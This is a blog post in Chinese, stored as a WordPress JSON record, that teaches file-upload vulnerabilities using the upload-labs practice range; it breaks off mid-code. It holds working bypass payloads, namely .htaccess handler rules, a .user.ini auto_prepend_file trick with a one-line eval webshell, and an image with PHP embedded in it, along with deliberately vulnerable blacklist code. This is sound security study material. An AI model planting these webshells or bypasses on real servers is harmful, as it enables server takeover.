{"id":105,"date":"2022-03-27T18:49:30","date_gmt":"2022-03-27T10:49:30","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=105"},"modified":"2023-09-22T14:02:59","modified_gmt":"2023-09-22T06:02:59","slug":"%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=105","title":{"rendered":"\u6587\u4ef6\u4e0a\u4f20"},"content":{"rendered":"<h3>\u7b80\u5355\u4ecb\u7ecd<\/h3>\n<p><strong>\u539f\u7406\uff1a<\/strong><\/p>\n<p>\u7531\u4e8e\u7a0b\u5e8f\u5458\u5728\u7f16\u5199\u4ee3\u7801\u65f6\u5019\u5728\u5bf9\u7528\u6237\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u5b9e\u73b0\u4ee3\u7801\u4e0a\u6ca1\u6709\u4e25\u683c\u9650\u5236\u7528\u6237\u4e0a\u4f20\u7684\u6587\u4ef6\u540e\u7f00\u4ee5\u53ca\u6587\u4ef6\u7c7b\u578b\u6216\u8005\u5904\u7406\u7f3a\u9677,\u800c\u5bfc\u81f4\u7528\u6237\u53ef\u4ee5\u8d8a\u8fc7\u5176\u672c\u8eab\u6743\u9650\u5411\u670d\u52a1\u5668\u4e0a\u4e0a\u4f20\u53ef\u6267\u884c\u7684\u52a8\u6001\u811a\u672c\u6587\u4ef6\uff0c\u7b80\u5355\u7684\u6765\u8bf4\u5c31\u662f\u670d\u52a1\u5668\u7aef\u6ca1\u6709\u5bf9\u5ba2\u6237\u7aef\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u4e25\u683c\u9a8c\u8bc1\u6216\u8fc7\u6ee4,\u7528\u6237\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2a\u53ef\u6267\u884c\u7684\u811a\u672c\u6587\u4ef6,\u5e76\u901a\u8fc7\u6b64\u811a\u672c\u83b7\u5f97\u4e86\u6267\u884c\u670d\u52a1\u5668\u7aef\u547d\u4ee4\u7684\u80fd\u529b\u800c\u5f15\u53d1\u5371\u5bb3<\/p>\n<p><strong>\u5371\u5bb3\uff1a<\/strong><\/p>\n<p>\u4e0a\u4f20webshell\uff0c\u88ab\u83b7\u53d6\u670d\u52a1\u5668\u6743\u9650<\/p>\n<p><strong>\u5224\u65ad\u53ef\u80fd\u51fa\u73b0\u7684\u4f4d\u7f6e\uff1a<\/strong><\/p>\n<ul>\n<li>\u80fd\u5426\u4e0a\u4f20\uff0c\u80fd\u5426\u627e\u5230\u8def\u5f84<\/li>\n<li>\u4efb\u4f55\u4e0a\u4f20\u70b9\uff0c\u6570\u636e\u5e93\u5907\u4efd\uff0c\u7f16\u8f91\u6a21\u677f<\/li>\n<\/ul>\n<h3>\u6821\u9a8c<\/h3>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/upload-labs-16492282405819.png\" alt=\"upload-labs\" \/><\/p>\n<p>HTTP\u8bf7\u6c42\u5934<\/p>\n<pre><code>POST \/upload.php HTTP\/1.1\nHost: localhost\nContent-Length: 274\nCache-Control: max-age=0\nOrigin: http:\/\/localhost\nUpgrade-Insecure-Requests: 1\nContent-Type: multipart\/form-data; boundary=----WebKitFormBoundaryuKS18BporicXJfTx\nUser-Agent: Mozilla\/5.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8\nAccept-Encoding: gzip, deflate, br\nAccept-Language: zh-CN,zh;q=0.8,de;q=0.6,en;q=0.4,fr;q=0.2\nConnection: close\n\n------WebKitFormBoundaryuKS18BporicXJfTx\nContent-Disposition: form-data; name=&quot;file_x&quot;; filename=&quot;xx.php&quot;<\/code><\/pre>\n<p>\u8bf7\u6c42Header\u4e2dContent-Type\u5b58\u5728\u4ee5\u4e0b\u7279\u5f81\uff1a<\/p>\n<ul>\n<li>multipart\/form-data\uff08\u8868\u793a\u8be5\u8bf7\u6c42\u662f\u4e00\u4e2a\u6587\u4ef6\u4e0a\u4f20\u8bf7\u6c42\uff09<\/li>\n<li>\u5b58\u5728boundary\u5b57\u7b26\u4e32\uff08\u4f5c\u7528\u4e3a\u5206\u9694\u7b26\uff0c\u4ee5\u533a\u5206POST\u6570\u636e\uff09<\/li>\n<\/ul>\n<p>POST\u7684\u5185\u5bb9\u5b58\u5728\u4ee5\u4e0b\u7279\u5f81\uff1a<\/p>\n<ul>\n<li>Content-Disposition<\/li>\n<li>name<\/li>\n<li>filename<\/li>\n<li>POST\u4e2d\u7684boundary\u7684\u503c\u5c31\u662fContent-Type\u7684\u503c\u5728\u6700\u524d\u9762\u52a0\u4e86\u4e24\u4e2a\u2013\uff0c\u9664\u4e86\u6700\u540e\u6807\u8bc6\u7ed3\u675f\u7684boundary<\/li>\n<\/ul>\n<h4>\u5ba2\u6237\u7aefJavaScript\u6821\u9a8c\uff08\u4e00\u822c\u53ea\u68c0\u9a8c\u540e\u7f00\u540d\uff09<\/h4>\n<p>\u4e00\u822c\u90fd\u662f\u7528javascript\u811a\u672c\u68c0\u9a8c\u4e0a\u4f20\u6587\u4ef6\u7684\u540e\u7f00<\/p>\n<h4>\u670d\u52a1\u7aef\u6821\u9a8c<\/h4>\n<h5>\u6587\u4ef6\u5934content-type\u5b57\u6bb5\u6821\u9a8c\uff08image\/gif\uff09<\/h5>\n<p>\u6a21\u62dfweb\u670d\u52a1\u5668\u7aef\u7684\u6821\u9a8c\u4ee3\u7801<\/p>\n<pre><code class=\"language-php\">&lt;?php\nif($_FILES[&#039;userfile&#039;][&#039;type&#039;] != &quot;image\/gif&quot;)  #\u8fd9\u91cc\u5bf9\u4e0a\u4f20\u7684\u6587\u4ef6\u7c7b\u578b\u8fdb\u884c\u5224\u65ad\uff0c\u5982\u679c\u4e0d\u662fimage\/gif\u7c7b\u578b\u4fbf\u8fd4\u56de\u9519\u8bef\u3002\n{   \n    echo &quot;Sorry, we only allow uploading GIF images&quot;;\n    exit;\n}\n$uploaddir = &#039;uploads\/&#039;;\n$uploadfile = $uploaddir . basename($_FILES[&#039;userfile&#039;][&#039;name&#039;]);\nif (move_uploaded_file($_FILES[&#039;userfile&#039;][&#039;tmp_name&#039;], $uploadfile))\n{\necho &quot;File is valid, and was successfully uploaded.\\n&quot;;\n}\nelse \n{\n   echo &quot;File uploading failed.\\n&quot;;\n}\n?&gt;<\/code><\/pre>\n<p>\u4ee3\u7801\u5bf9\u4e0a\u4f20\u6587\u4ef6\u7684\u6587\u4ef6\u7c7b\u578b\u8fdb\u884c\u4e86\u5224\u65ad\uff0c\u5982\u679c\u4e0d\u662f\u56fe\u7247\u7c7b\u578b\uff0c\u8fd4\u56de\u9519\u8bef<\/p>\n<h5>\u6587\u4ef6\u5185\u5bb9\u5934\u6821\u9a8c\uff08GIF89a\uff09<\/h5>\n<p>\u4e3b\u8981\u662f\u68c0\u6d4b\u6587\u4ef6\u5185\u5bb9\u5f00\u59cb\u5904\u7684\u6587\u4ef6\u5e7b\u6570<\/p>\n<pre><code>.JPEG;.JPE;.JPG\uff0c\u201dJPGGraphic File\u201d\n.gif\uff0c\u201dGIF 89A\u201d\n.zip\uff0c\u201dZip Compressed\u201d\n.doc;.xls;.xlt;.ppt;.apr\uff0c\u201dMS Compound Document v1 or Lotus Approach APRfile\u201d<\/code><\/pre>\n<h5>\u540e\u7f00\u540d\u9ed1\u540d\u5355\u6821\u9a8c<\/h5>\n<p>\u4f7f\u7528\u9ed1\u540d\u5355\u5bf9\u4e0a\u4f20\u7684\u6587\u4ef6\u8fdb\u884c\u8fc7\u6ee4\uff0c\u4e3b\u8981\u662f\u5bf9\u540e\u7f00\u8fdb\u884c\u8fc7\u6ee4\uff0c\u53ef\u80fd\u4f1a\u56e0\u4e3a\u8fc7\u6ee4\u4e0d\u5168\u6216\u672a\u5bf9\u4e0a\u4f20\u540d\u5355\u8bcd\u8fdb\u884c\u654f\u611f\u5b57\u7b26\u6e05\u9664<\/p>\n<h5>\u540e\u7f00\u540d\u767d\u540d\u5355\u6821\u9a8c<\/h5>\n<h5>\u81ea\u5b9a\u4e49\u6b63\u5219\u6821\u9a8c<\/h5>\n<h5>WAF\u8bbe\u5907\u6821\u9a8c\uff08\u6839\u636e\u4e0d\u540c\u7684WAF\u4ea7\u54c1\u800c\u5b9a\uff09<\/h5>\n<h5>\u5176\u4ed6<\/h5>\n<ul>\n<li>\u6587\u4ef6\u5185\u5bb9\u68c0\u6d4b\n<ul>\n<li>\u56fe\u50cf\u6587\u4ef6\u76f8\u5173\u4fe1\u606f\u68c0\u6d4b\u5e38\u7528\u7684\u5c31\u662fgetimagesize()\u51fd\u6570\uff0c\u9700\u8981\u628a\u6587\u4ef6\u5934\u90e8\u5206\u4f2a\u9020\u597d\uff0c\u5c31\u662f\u5728\u5e7b\u6570\u7684\u57fa\u7840\u4e0a\u8fd8\u52a0\u4e86\u4e00\u4e9b\u6587\u4ef6\u4fe1\u606f<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<pre><code class=\"language-php\">GIF89a\n(...some binary data for image...)\n&lt;?php phpinfo(); ?&gt;\n(... skipping the rest of binary data ...)<\/code><\/pre>\n<ul>\n<li>\u6587\u4ef6\u52a0\u8f7d\u68c0\u6d4b\n<ul>\n<li>\u4e00\u822c\u662f\u8c03\u7528API\u51fd\u6570\u53bb\u8fdb\u884c\u6587\u4ef6\u52a0\u8f7d\u6d4b\u8bd5\uff0c\u5e38\u89c1\u7684\u662f\u56fe\u50cf\u6e32\u67d3\u6d4b\u8bd5\uff0c\u518d\u53d8\u6001\u70b9\u7684\u662f\u8fdb\u884c\u4e8c\u6b21\u6e32\u67d3\u3002\u5bf9\u6e32\u67d3\/\u52a0\u8f7d\u6d4b\u8bd5\u7684\u653b\u51fb\u65b9\u5f0f\u662f\u4ee3\u7801\u6ce8\u5165\u7ed5\u8fc7\uff1b\u5bf9\u4e8c\u6b21\u6e32\u67d3\u7684\u653b\u51fb\u65b9\u5f0f\u662f\u653b\u51fb\u6587\u4ef6\u52a0\u8f7d\u5668\u81ea\u8eab\u3002<br \/>\n\u4e8c\u6b21\u6e32\u67d3\uff1a\u76f8\u5f53\u4e8e\u662f\u628a\u539f\u672c\u5c5e\u4e8e\u56fe\u50cf\u6570\u636e\u7684\u90e8\u5206\u6293\u4e86\u51fa\u6765\uff0c\u518d\u7528\u81ea\u5df1\u7684API\u6216\u51fd\u6570\u8fdb\u884c\u91cd\u65b0\u6e32\u67d3\uff0c\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u975e\u56fe\u50cf\u6570\u636e\u7684\u90e8\u5206\u76f4\u63a5\u5c31\u88ab\u9694\u79bb\u5f00\u4e86<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4>\u7ed5\u8fc7<\/h4>\n<h5>\u524d\u7aef\u7ed5\u8fc7<\/h5>\n<p>\u6307\u6570\u636e\u4e0a\u4f20\u540e\u4e3a\u63d0\u4ea4\u5230\u670d\u52a1\u5668\uff0c\u800c\u662f\u7531\u4e8e\u7f51\u7ad9\u9875\u9762\u7684js\u5bf9\u5176\u8fdb\u884c\u8fc7\u6ee4\uff0c\u786e\u8ba4\u662f\u5426\u53ef\u4ee5\u4e0a\u4f20,\u5220\u9664\u9650\u5236\u4e0a\u4f20js\u89c4\u5219\u5373\u53ef<\/p>\n<h5>\u9ed1\u540d\u5355\u7ed5\u8fc7<\/h5>\n<pre><code>\u7279\u6b8a\u89e3\u6790\u540e\u7f00\u7ed5\u8fc7\nhtaccess\u89e3\u6790\u7ed5\u8fc7\n\u5927\u5c0f\u5199\u7ed5\u8fc7\n\u70b9\u7ed5\u8fc7\n\u7a7a\u683c\u7ed5\u8fc7\n::$$DATA\u6570\u636e\u6d41\u7ed5\u8fc7\n\u914d\u5408\u89e3\u6790\u7ed5\u8fc7\n\u53cc\u540e\u7f00\u89e3\u6790\u7ed5\u8fc7<\/code><\/pre>\n<h6><strong>\u7279\u6b8a\u89e3\u6790\u540e\u7f00\u7ed5\u8fc7 -upload-labs-03<\/strong><\/h6>\n<p>\u9ed1\u540d\u5355\u9650\u5236php\u4e0a\u4f20\uff0c\u4f46apache\u5bf9php3.php5.phtml\u7b49\u4e5f\u53ef\u4ee5\u76f4\u63a5\u89e3\u6790\u4e3aphp\uff0c\u6545\u53ef\u5c06php\u540e\u7f00\u6539\u4e3aphp3\u7b49\uff0c\u5982\u679c\u4e0a\u4f20\u6210\u529f.php3,\u5982\u679cApache\u4e0d\u80fd\u89e3\u6790\uff0c\u5728Apache\u7684\u914d\u7f6e\u6587\u4ef6httpd.conf\u6587\u4ef6\u4e2d\u6dfb\u8bed\u53e5php3\u5373\u53ef<img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220325153628067-164922824058911.png\" alt=\"image-20220325153628067\" \/><\/p>\n<h6><strong>.htaccess\u89e3\u6790\u7ed5\u8fc7-upload-labs-04<\/strong><\/h6>\n<p>.htaccess\u662f\u4e00\u4e2a\u7eaf\u6587\u672c\u6587\u4ef6\uff0c\u5b83\u91cc\u9762\u5b58\u653e\u7740Apache\u670d\u52a1\u5668\u914d\u7f6e\u76f8\u5173\u7684\u6307\u4ee4\u6211\u4eec\u4f7f\u7528apache\u90e8\u7f72\u4e00\u4e2a\u7f51\u7ad9\u4ee3\u7801\u51c6\u5907\u90e8\u7f72\u5230\u7f51\u4e0a\u7684\u65f6\u5019\uff0c\u6211\u4eec\u624b\u4e2d\u7684apache\u7684httpd.conf\u5927\u5bb6\u80af\u5b9a\u90fd\u77e5\u9053\u3002\u8fd9\u662fapache\u7684\u914d\u7f6e\u6587\u4ef6\uff0c\u7136\u800c\u6211\u4eec\u5927\u591a\u6570\u7684\u7f51\u7ad9\u90fd\u662f\u57fa\u4e8e\u4e91\u670d\u52a1\u5668\u6765\u90e8\u7f72\u7684\uff0c\u8fd8\u6709\u5c31\u662f\u56e2\u961f\u534f\u4f5c\u5f00\u53d1\u7684\u65f6\u5019\uff0c\u6211\u4eec\u5f88\u96be\u76f4\u63a5\u4fee\u6539\u516c\u5171\u7684httpd.conf\uff0c\u8fd9\u65f6 .htaccess\u5c31\u662fhttpd.conf\u7684\u884d\u751f\u54c1\uff0c\u5b83\u8d77\u7740\u548chttpd.conf\u76f8\u540c\u7684\u4f5c\u7528<\/p>\n<h6><strong>.htaccess\u7684\u57fa\u672c\u4f5c\u7528<\/strong><\/h6>\n<ul>\n<li>URL\u91cd\u5199\u3001\u81ea\u5b9a\u4e49\u9519\u8bef\u9875\u9762<\/li>\n<li>MIME\u7c7b\u578b\u914d\u7f6e<\/li>\n<li>\u8bbf\u95ee\u6743\u9650\u63a7\u5236\u7b49<\/li>\n<li>\u4e3b\u8981\u4f53\u73b0\u5728\u4f2a\u9759\u6001\u7684\u5e94\u7528<\/li>\n<li>\u56fe\u7247\u9632\u76d7\u94fe<\/li>\n<li>\u81ea\u5b9a\u4e49404\u9519\u8bef\u9875\u9762<\/li>\n<li>\u963b\u6b62\/\u5141\u8bb8\u7279\u5b9aIP\/IP\u6bb5<\/li>\n<li>\u76ee\u5f55\u6d4f\u89c8\u4e0e\u4e3b\u9875<\/li>\n<li>\u7981\u6b62\u8bbf\u95ee\u6307\u5b9a\u6587\u4ef6\u7c7b\u578b<\/li>\n<li>\u6587\u4ef6\u5bc6\u7801\u4fdd\u62a4<\/li>\n<\/ul>\n<p><strong>\u542f\u7528.htaccess<\/strong><\/p>\n<p>httpd.conf,\u67e5\u627eAllowOverride\u3002\u542f\u7528AllowOverride\u2014\u2014\u2014\u2014\u5141\u8bb8\u91cd\u5199\u8986\u76d6\u76f8\u5173\u914d\u7f6e<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220325154759367-164922824058913.png\" alt=\"image-20220325154759367\" \/><\/p>\n<p>\u6253\u5f00mod_rewrite\u673a\u5236\uff0c\u5373\u8fd8\u662f\u5728.httpd.conf\u4e2d\u67e5\u627emod_rewrite.so\u2014\u2014\u2014\u2014\u5728httpd.conf\u5916\u91cd\u5199\u914d\u7f6e<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220325155125472-164922824058915.png\" alt=\"image-20220325155125472\" \/><\/p>\n<p>\u5148\u4e0a\u4f20htaccess\u6587\u4ef6\uff0c\u91cd\u65b0\u547d\u540d\u89e3\u6790\u89c4\u5219\uff0c\u53ea\u9488\u5bf9\u5f53\u524d\u76ee\u5f55\u4e0b<\/p>\n<pre><code>&lt;IfModule mime_module&gt; SetHandler application\/x-httpd-php #\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\uff0c\u6240\u6709\u6587\u4ef6\u90fd\u4f1a\u88ab\u89e3\u6790\u6210php\u4ee3\u7801\u6267\u884c \n&lt;\/IfModule&gt; \u6216 \nAddType application\/x-httpd-php .jpg #\u5c06\u5f53\u524d\u76ee\u5f55\u4e0bjpg\u6587\u4ef6\u5f53\u4f5cphp\u8fd0\u884c<\/code><\/pre>\n<p>\u518d\u4e0a\u4f20\u5199\u5165php\u7684\u56fe\u7247\uff08\u56fe\u7247\u9a6c\uff09\u5373\u53ef<\/p>\n<h6><strong>.user.ini<\/strong><\/h6>\n<p>php.ini\u662fphp\u7684\u5168\u5c40\u914d\u7f6e\u6587\u4ef6\uff0c\u5bf9\u6574\u4e2aweb\u670d\u52a1\u8d77\u4f5c\u7528\uff0c.user.ini\u548c.htaccess\u90fd\u662f\u76ee\u5f55\u7684\u914d\u7f6e\u6587\u4ef6\uff0c.user.ini\u662f\u7528\u6237\u81ea\u5b9a\u4e49\u7684php.ini\uff0c\u901a\u5e38\u6784\u9020\u540e\u95e8\u548c\u9690\u85cf\u540e\u95e8<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220325172015125-164922824059017.png\" alt=\"image-20220325172015125\" \/><\/p>\n<p>\u5176\u4e2d\u5c31\u63d0\u5230\u4e86\uff0c\u6a21\u5f0f\u4e3aPHP_INI_USER\u7684\u914d\u7f6e\u9879\uff0c\u53ef\u4ee5\u5728ini_set()\u51fd\u6570\u4e2d\u8bbe\u7f6e\u3001\u6ce8\u518c\u8868\u4e2d\u8bbe\u7f6e\uff0c\u518d\u5c31\u662f.user.ini\u4e2d\u8bbe\u7f6e\u3002 \u8fd9\u91cc\u5c31\u63d0\u5230\u4e86.user.ini\uff0c\u90a3\u4e48\u8fd9\u662f\u4e2a\u4ec0\u4e48\u914d\u7f6e\u6587\u4ef6\uff1f\u90a3\u4e48\u5b98\u65b9\u6587\u6863\u5728<a href=\"http:\/\/php.net\/manual\/zh\/configuration.file.per-user.php\" target=\"_blank\"  rel=\"nofollow\" >\u8fd9\u91cc<\/a>\u53c8\u89e3\u91ca\u4e86\uff1a<\/p>\n<p>\u9664\u4e86\u4e3b php.ini \u4e4b\u5916\uff0cPHP \u8fd8\u4f1a\u5728\u6bcf\u4e2a\u76ee\u5f55\u4e0b\u626b\u63cf INI \u6587\u4ef6\uff0c\u4ece\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u6240\u5728\u76ee\u5f55\u5f00\u59cb\u4e00\u76f4\u4e0a\u5347\u5230 web \u6839\u76ee\u5f55\uff08<code>$_SERVER[&#039;DOCUMENT_ROOT&#039;]<\/code> \u6240\u6307\u5b9a\u7684\uff09\u3002\u5982\u679c\u88ab\u6267\u884c\u7684 PHP \u6587\u4ef6\u5728 web \u6839\u76ee\u5f55\u4e4b\u5916\uff0c\u5219\u53ea\u626b\u63cf\u8be5\u76ee\u5f55<\/p>\n<p>\u5728 <code>.user.ini<\/code> \u98ce\u683c\u7684 INI \u6587\u4ef6\u4e2d\u53ea\u6709\u5177\u6709 PHP_INI_PERDIR \u548c PHP_INI_USER \u6a21\u5f0f\u7684 INI \u8bbe\u7f6e\u53ef\u88ab\u8bc6\u522b\u3002<\/p>\n<p>\u8fd9\u91cc\u5c31\u5f88\u6e05\u695a\u4e86\uff0c<code>.user.ini<\/code>\u5b9e\u9645\u4e0a\u5c31\u662f\u4e00\u4e2a\u53ef\u4ee5\u7531\u7528\u6237\u201c\u81ea\u5b9a\u4e49\u201d\u7684php.ini\uff0c\u6211\u4eec\u80fd\u591f\u81ea\u5b9a\u4e49\u7684\u8bbe\u7f6e\u662f\u6a21\u5f0f\u4e3a\u201cPHP_INI_PERDIR \u3001 PHP_INI_USER\u201d\u7684\u8bbe\u7f6e\u3002\uff08\u4e0a\u9762\u8868\u683c\u4e2d\u6ca1\u6709\u63d0\u5230\u7684PHP_INI_PERDIR\u4e5f\u53ef\u4ee5\u5728.user.ini\u4e2d\u8bbe\u7f6e\uff09<\/p>\n<p>\u5b9e\u9645\u4e0a\uff0c\u9664\u4e86<code>PHP_INI_SYSTEM<\/code>\u4ee5\u5916\u7684\u6a21\u5f0f\uff08\u5305\u62ecPHP_INI_ALL\uff09\u90fd\u662f\u53ef\u4ee5\u901a\u8fc7.user.ini\u6765\u8bbe\u7f6e\u7684<\/p>\n<p>\u800c\u4e14\uff0c\u548c<code>php.ini<\/code>\u4e0d\u540c\u7684\u662f\uff0c<code>.user.ini<\/code>\u662f\u4e00\u4e2a\u80fd\u88ab\u52a8\u6001\u52a0\u8f7d\u7684ini\u6587\u4ef6\u3002\u4e5f\u5c31\u662f\u8bf4\u6211\u4fee\u6539\u4e86<code>.user.ini<\/code>\u540e\uff0c\u4e0d\u9700\u8981\u91cd\u542f\u670d\u52a1\u5668\u4e2d\u95f4\u4ef6\uff0c\u53ea\u9700\u8981\u7b49\u5f85<code>user_ini.cache_ttl<\/code>\u6240\u8bbe\u7f6e\u7684\u65f6\u95f4\uff08\u9ed8\u8ba4\u4e3a300\u79d2\uff09\uff0c\u5373\u53ef\u88ab\u91cd\u65b0\u52a0\u8f7d<\/p>\n<p><strong>\u5229\u7528<\/strong><\/p>\n<pre><code>auto_prepend_file\/\/\u76f8\u5f53\u4e8e\u5728\u6240\u6709php\u5f00\u5934\u5199\u5165require\nauto_append_file\/\/\u76f8\u5f53\u4e8e\u5728php\u6700\u540e\u5199\u5165require<\/code><\/pre>\n<p>\u5047\u8bbe\u73b0\u5728\u76ee\u5f55\u4e0b\u6709\u4e00\u4e2aindex.php\u6587\u4ef6,\u8be5\u76ee\u5f55\u53ef\u4ee5\u8fdb\u884c\u4e0a\u4f20<\/p>\n<p>\u6211\u4eec\u9700\u8981\u4e0a\u4f20\u4e24\u4e2a\u6587\u4ef6\u6765\u8fdb\u884c\u5229\u7528<\/p>\n<p>\u9996\u5148\u662f<\/p>\n<pre><code>a.jpg\n\/\/\u5185\u5bb9\u662f\uff1a\n&lt;?php eval($_GET[&#039;shell&#039;]); ?&gt;<\/code><\/pre>\n<p>\u7136\u540e\u662f.user.ini\u6587\u4ef6<\/p>\n<pre><code>auto_prepend_file=a.jpg<\/code><\/pre>\n<p>\u76f8\u5f53\u4e8e\u5728\u6240\u6709php\u6587\u4ef6\u5934\u91cc\u5199\u5165\u4e86require('.\/a.jpg')<\/p>\n<h6><strong>\u5927\u5c0f\u5199\u7ed5\u8fc7-upload-labs-05<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])) {\n    if (file_exists(UPLOAD_PATH)) {\n        $deny_ext = array(&quot;.php&quot;,&quot;.php5&quot;,&quot;.php4&quot;,&quot;.php3&quot;,&quot;.php2&quot;,&quot;.html&quot;,&quot;.htm&quot;,&quot;.phtml&quot;,&quot;.pht&quot;,&quot;.pHp&quot;,&quot;.pHp5&quot;,&quot;.pHp4&quot;,&quot;.pHp3&quot;,&quot;.pHp2&quot;,&quot;.Html&quot;,&quot;.Htm&quot;,&quot;.pHtml&quot;,&quot;.jsp&quot;,&quot;.jspa&quot;,&quot;.jspx&quot;,&quot;.jsw&quot;,&quot;.jsv&quot;,&quot;.jspf&quot;,&quot;.jtml&quot;,&quot;.jSp&quot;,&quot;.jSpx&quot;,&quot;.jSpa&quot;,&quot;.jSw&quot;,&quot;.jSv&quot;,&quot;.jSpf&quot;,&quot;.jHtml&quot;,&quot;.asp&quot;,&quot;.aspx&quot;,&quot;.asa&quot;,&quot;.asax&quot;,&quot;.ascx&quot;,&quot;.ashx&quot;,&quot;.asmx&quot;,&quot;.cer&quot;,&quot;.aSp&quot;,&quot;.aSpx&quot;,&quot;.aSa&quot;,&quot;.aSax&quot;,&quot;.aScx&quot;,&quot;.aShx&quot;,&quot;.aSmx&quot;,&quot;.cEr&quot;,&quot;.sWf&quot;,&quot;.swf&quot;,&quot;.htaccess&quot;);\n        $file_name = trim($_FILES[&#039;upload_file&#039;][&#039;name&#039;]);\n        $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n        $file_ext = strrchr($file_name, &#039;.&#039;);\n        $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n        $file_ext = str_ireplace(&#039;::$DATA&#039;, &#039;&#039;, $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n        $file_ext = trim($file_ext); \/\/\u9996\u5c3e\u53bb\u7a7a\n\n        if (!in_array($file_ext, $deny_ext)) {\n            $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n            $img_path = UPLOAD_PATH.&#039;\/&#039;.$file_name;\n            if (move_uploaded_file($temp_file, $img_path)) {\n                $is_upload = true;\n            } else {\n                $msg = &#039;\u4e0a\u4f20\u51fa\u9519\uff01&#039;;\n            }\n        } else {\n            $msg = &#039;\u6b64\u6587\u4ef6\u7c7b\u578b\u4e0d\u5141\u8bb8\u4e0a\u4f20\uff01&#039;;\n        }\n    } else {\n        $msg = UPLOAD_PATH . &#039;\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01&#039;;\n    }\n}<\/code><\/pre>\n<p>\u4ee3\u7801\u672a\u8fc7\u6ee4\u5927\u5c0f\u5199\uff0c\u5bfc\u81f4Php\u53ef\u4e0a\u4f20\u540e\u4efb\u53ef\u89e3\u6790\u4e3aphp<\/p>\n<h6><strong>\u52a0\u70b9\u7ed5\u8fc7-upload-labs-07<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])) {\n    if (file_exists(UPLOAD_PATH)) {\n        $deny_ext = array(&quot;.php&quot;,&quot;.php5&quot;,&quot;.php4&quot;,&quot;.php3&quot;,&quot;.php2&quot;,&quot;.html&quot;,&quot;.htm&quot;,&quot;.phtml&quot;,&quot;.pht&quot;,&quot;.pHp&quot;,&quot;.pHp5&quot;,&quot;.pHp4&quot;,&quot;.pHp3&quot;,&quot;.pHp2&quot;,&quot;.Html&quot;,&quot;.Htm&quot;,&quot;.pHtml&quot;,&quot;.jsp&quot;,&quot;.jspa&quot;,&quot;.jspx&quot;,&quot;.jsw&quot;,&quot;.jsv&quot;,&quot;.jspf&quot;,&quot;.jtml&quot;,&quot;.jSp&quot;,&quot;.jSpx&quot;,&quot;.jSpa&quot;,&quot;.jSw&quot;,&quot;.jSv&quot;,&quot;.jSpf&quot;,&quot;.jHtml&quot;,&quot;.asp&quot;,&quot;.aspx&quot;,&quot;.asa&quot;,&quot;.asax&quot;,&quot;.ascx&quot;,&quot;.ashx&quot;,&quot;.asmx&quot;,&quot;.cer&quot;,&quot;.aSp&quot;,&quot;.aSpx&quot;,&quot;.aSa&quot;,&quot;.aSax&quot;,&quot;.aScx&quot;,&quot;.aShx&quot;,&quot;.aSmx&quot;,&quot;.cEr&quot;,&quot;.sWf&quot;,&quot;.swf&quot;,&quot;.htaccess&quot;,&quot;.ini&quot;);\n        $file_name = $_FILES[&#039;upload_file&#039;][&#039;name&#039;];\n        $file_name = deldot($file_name);\/\/\u5220\u9664\u6587\u4ef6\u540d\u672b\u5c3e\u7684\u70b9\n        $file_ext = strrchr($file_name, &#039;.&#039;);\n        $file_ext = strtolower($file_ext); \/\/\u8f6c\u6362\u4e3a\u5c0f\u5199\n        $file_ext = str_ireplace(&#039;::$DATA&#039;, &#039;&#039;, $file_ext);\/\/\u53bb\u9664\u5b57\u7b26\u4e32::$DATA\n\n        if (!in_array($file_ext, $deny_ext)) {\n            $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n            $img_path = UPLOAD_PATH.&#039;\/&#039;.date(&quot;YmdHis&quot;).rand(1000,9999).$file_ext;\n            if (move_uploaded_file($temp_file,$img_path)) {\n                $is_upload = true;\n            } else {\n                $msg = &#039;\u4e0a\u4f20\u51fa\u9519\uff01&#039;;\n            }\n        } else {\n            $msg = &#039;\u6b64\u6587\u4ef6\u4e0d\u5141\u8bb8\u4e0a\u4f20&#039;;\n        }\n    } else {\n        $msg = UPLOAD_PATH . &#039;\u6587\u4ef6\u5939\u4e0d\u5b58\u5728,\u8bf7\u624b\u5de5\u521b\u5efa\uff01&#039;;\n    }\n}<\/code><\/pre>\n<p>\u5728windows\u4e2d\u4e00\u4e2a\u6587\u4ef6\u7684\u540e\u7f00\u52a0\u4e0a\u4e00\u4e2a\u70b9\u4e0e\u539f\u6765\u7684\u540e\u7f00\u6ca1\u6709\u533a\u522b\uff0c\u4ece\u800c\u7528\u6765\u6587\u4ef6\u4e0a\u4f20\u7ed5\u8fc7<\/p>\n<h6><strong>\u7a7a\u683c\u7ed5\u8fc7-upload-labs-06<\/strong><\/h6>\n<pre><code class=\"language-php\">$is_upload = false;\n$msg = null;\nif (isset($_POST[&#039;submit&#039;])) {\n    if (file_exists(UPLOAD_PATH)) {\n        $deny_ext = 